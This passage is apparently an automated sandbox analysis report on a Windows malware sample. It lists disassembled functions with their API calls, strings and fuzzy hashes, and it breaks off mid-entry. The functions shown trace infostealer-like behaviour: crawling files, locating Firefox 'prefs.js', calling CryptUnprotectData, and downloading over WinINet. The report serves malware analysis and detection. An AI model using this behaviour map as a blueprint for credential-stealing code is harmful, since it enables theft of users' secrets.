Instruction Fuzzy Hash: 5142BB71901108A7CB14FBB1DC96EED733DAF84314F40456EF90A66191EF389B98CB9A

Function 6C6D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
__aulldiv.LIBCMT ref: 6C6D36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C6D3773
EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D377E
LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6D37C4
EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6D37CB
LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6D3801
__aulldiv.LIBCMT ref: 6C6D3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C6D3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C6D3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C6D394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C6D35DB
QPC, xrefs: 6C6D38FC
AuthcAMDenti, xrefs: 6C6D3946
GenuntelineI, xrefs: 6C6D3639
GTC, xrefs: 6C6D3912

Memory Dump Source

Source File: 00000000.00000002.2441563496.000000006C6D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6D0000, based on PE: true

Associated: 00000000.00000002.2441528205.000000006C6D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441654899.000000006C75E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2441684437.000000006C762000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6d0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: cdac71db555954c5cc14f912ed0644b61ebfb9220c7324814ae7d6cf6155d432
Instruction ID: 261f36677603b2365a910ec73c55019c92fa6a9d7d9d10d6a405515b2a941301
Opcode Fuzzy Hash: cdac71db555954c5cc14f912ed0644b61ebfb9220c7324814ae7d6cf6155d432
Instruction Fuzzy Hash: 78B1A3B1B053109FDB08DF28C94465ABBF5FB8A704F45893EE899D7790DB34A904CB85

Function 004143F0 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0041440C
FindFirstFileA.KERNEL32(?,?), ref: 00414423
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
FindClose.KERNEL32(000000FF), ref: 00414672

Strings

%s\%s, xrefs: 004144DB
%s\*, xrefs: 00414400
%s\%s, xrefs: 00414484

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 61ac3ecc151a1144b0c376dff066e00be32e9f6d56b6178ffe50450b9c322721
Instruction ID: 93dd7dc702b7a0e0fded8c7806ce8f3795ba14a1618ae0d79b753d530a2b99d1
Opcode Fuzzy Hash: 61ac3ecc151a1144b0c376dff066e00be32e9f6d56b6178ffe50450b9c322721
Instruction Fuzzy Hash: 11616571900618ABCB30EFA0DC49FEE737DBF48704F408599F50996151EB78AB858FA5

Function 004139B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004139D3
FindFirstFileA.KERNEL32(?,?), ref: 004139EA
StrCmpCA.SHLWAPI(?,00420F7C), ref: 00413A18
StrCmpCA.SHLWAPI(?,00420F80), ref: 00413A2E
FindNextFileA.KERNEL32(000000FF,?), ref: 00413B7C
FindClose.KERNEL32(000000FF), ref: 00413B91

Strings

%s\%s, xrefs: 004139C7

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 853e2696d4e921a5124c8b138e35452fbac2c551aff32a76306c0037117ea167
Instruction ID: 0978cf4b12305aed0c6265f700eadee139911ff0226e3ee7039eca2cb0139609
Opcode Fuzzy Hash: 853e2696d4e921a5124c8b138e35452fbac2c551aff32a76306c0037117ea167
Instruction Fuzzy Hash: EE5188B1900218ABCB24EF60DC45EEE777DBF44304F40858DB60996151EB749BC5CF98

Function 0040F4F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042155C,00420D7E), ref: 0040F55E
StrCmpCA.SHLWAPI(?,00421560), ref: 0040F5AF
StrCmpCA.SHLWAPI(?,00421564), ref: 0040F5C5
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040F8F1
FindClose.KERNEL32(000000FF), ref: 0040F903

Strings

prefs.js, xrefs: 0040F652

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 84ce8f2d7b277bedd9634a257b1b482fb68a07a6dda5d1367702c5bc9c8e150f
Instruction ID: 51e7ee45db09aa5f39b002a0c415dffe3bc9b22f3a493195af03bb486277efdd
Opcode Fuzzy Hash: 84ce8f2d7b277bedd9634a257b1b482fb68a07a6dda5d1367702c5bc9c8e150f
Instruction Fuzzy Hash: 00B17571901108ABCB24FF61DC56FEE7379AF54314F0081BEA40A57191EF386B99CB9A

Function 00401710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425004,?,00401F6C,?,004250AC,?,?,00000000,?,00000000), ref: 00401963
StrCmpCA.SHLWAPI(?,00425154), ref: 004019B3
StrCmpCA.SHLWAPI(?,004251FC), ref: 004019C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
DeleteFileA.KERNEL32(00000000), ref: 00401E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
FindClose.KERNEL32(000000FF), ref: 00401E72

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Strings

\*.*, xrefs: 00401831

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 54b2977a6c195f960a67c42a943fd89950e5c79d47006c785fde3cd42dddedca
Instruction ID: 16b9519e73a2a048c1aa4c2f75882a05a68b4b793ed3d445f0fb30e7c05d6763
Opcode Fuzzy Hash: 54b2977a6c195f960a67c42a943fd89950e5c79d47006c785fde3cd42dddedca
Instruction Fuzzy Hash: 83123F71911118ABCB15FB61CC96EEE7338AF54314F4041AEB50B62091EF786BD8CF9A

Function 0040D8C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00421454,00420B96), ref: 0040D92B
StrCmpCA.SHLWAPI(?,00421458), ref: 0040D973
StrCmpCA.SHLWAPI(?,0042145C), ref: 0040D989
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DC0C
FindClose.KERNEL32(000000FF), ref: 0040DC1E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 22236b82cf087d824df9c59183de667ebb9ef6d0f22df6aaae8e82cea0f3e5f3
Instruction ID: be130f63dcff9d07870f4f5a4cae658f80ac6a3b159c82c28f33fed987b29411
Opcode Fuzzy Hash: 22236b82cf087d824df9c59183de667ebb9ef6d0f22df6aaae8e82cea0f3e5f3
Instruction Fuzzy Hash: 23914672900204A7CB14FBB1DC56DED737DAF94354F00866EF80A66191EE389B5C8B9B

Function 00405000 Relevance: 12.1, APIs: 8, Instructions: 82networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
RtlAllocateHeap.NTDLL(00000000), ref: 00405021
InternetOpenA.WININET(00420DC7,00000000,00000000,00000000,00000000), ref: 0040503A
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
InternetReadFile.WININET(004159BB,?,00000400,00000000), ref: 00405091
memcpy.MSVCRT ref: 004050DA
InternetCloseHandle.WININET(004159BB), ref: 00405109
InternetCloseHandle.WININET(?), ref: 00405116

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
String ID:
API String ID: 1008454911-0
Opcode ID: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction ID: 839bf57ea29f75d8981f3e40a03c3eb3ba9ac3aa2e1ac21d7b315b502f3c448d
Opcode Fuzzy Hash: d639e477f116241a0e401493819a9aeee025cbe198c1119cc2fd44f54bc7604c
Instruction Fuzzy Hash: 1D31E9B4A00618ABDB20CF54DD85BDDB7B5EF48304F5081E9BA09A7281C7746AC68F99

Function 0040E270 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420C1F), ref: 0040E2E2
StrCmpCA.SHLWAPI(?,0042149C), ref: 0040E332
StrCmpCA.SHLWAPI(?,004214A0), ref: 0040E348
FindNextFileA.KERNEL32(000000FF,?), ref: 0040EA1F

Strings

\*.*, xrefs: 0040E28D
.@, xrefs: 0040EA35, 0040E42B, 0040E55C, 0040E69B, 0040E2F9, 0040E42E, 0040E55F, 0040E69E

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: .@$\*.*
API String ID: 433455689-1178718010
Opcode ID: 94796d4c1a7fd6a30e028b82cb7fa6c85487261002e7f367cb8049464cc82b1d
Instruction ID: 20f818950e8166c8af1a449285f1ab07a785d4baccce5c5ed3abadeee2d63442
Opcode Fuzzy Hash: 94796d4c1a7fd6a30e028b82cb7fa6c85487261002e7f367cb8049464cc82b1d
Instruction Fuzzy Hash: BE125331911118ABCB14FB61DC5AEED7338AF54314F4045AEB90B62091EF786FD8CB9A

Function 00417630 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

GetKeyboardLayoutList.USER32(00000000,00000000,0042059F), ref: 00417681
LocalAlloc.KERNEL32(00000040,?), ref: 00417699
GetKeyboardLayoutList.USER32(?,00000000), ref: 004176AD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417702
LocalFree.KERNEL32(00000000), ref: 004177C2

Strings

/ , xrefs: 0041771F

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 53d7c83f888d95ad92835657e1a3e513734f7c10d93efab6a41b77accf7925d5
Instruction ID: c1db32f68e501b8527b0747275b78d72b64e7f1ab46943026d097e8974929a8d
Opcode Fuzzy Hash: 53d7c83f888d95ad92835657e1a3e513734f7c10d93efab6a41b77accf7925d5
Instruction Fuzzy Hash: 49418F71941118ABCB24DF94DC89FEEB374FB54314F2041DAE40A62191DB782F85CFA5

Function 004190A0 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004190BE
Process32First.KERNEL32(00420AB3,00000128), ref: 004190D2
Process32Next.KERNEL32(00420AB3,00000128), ref: 004190E7
StrCmpCA.SHLWAPI(?,00000000), ref: 004190FC
CloseHandle.KERNEL32(00420AB3), ref: 0041911A

Memory Dump Source

Source File: 00000000.00000002.2418643006.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2418643006.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2418643006.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction ID: 54ad55f7a4b81502d496241441e07260b80a378e6eebdd4a9cd1ea64267145a6
Opcode Fuzzy Hash: 53cc5b1a25e9de08871f2f161f83c20120fe0a383d746f94447c3d4f9de0246b
Instruction Fuzzy Hash: 1E010875A00208FBDB20DFA4CD99BEEBBF9AF08700F104199E909A7250DB749E85DF55

Function 00409BB0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BD4
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BF3
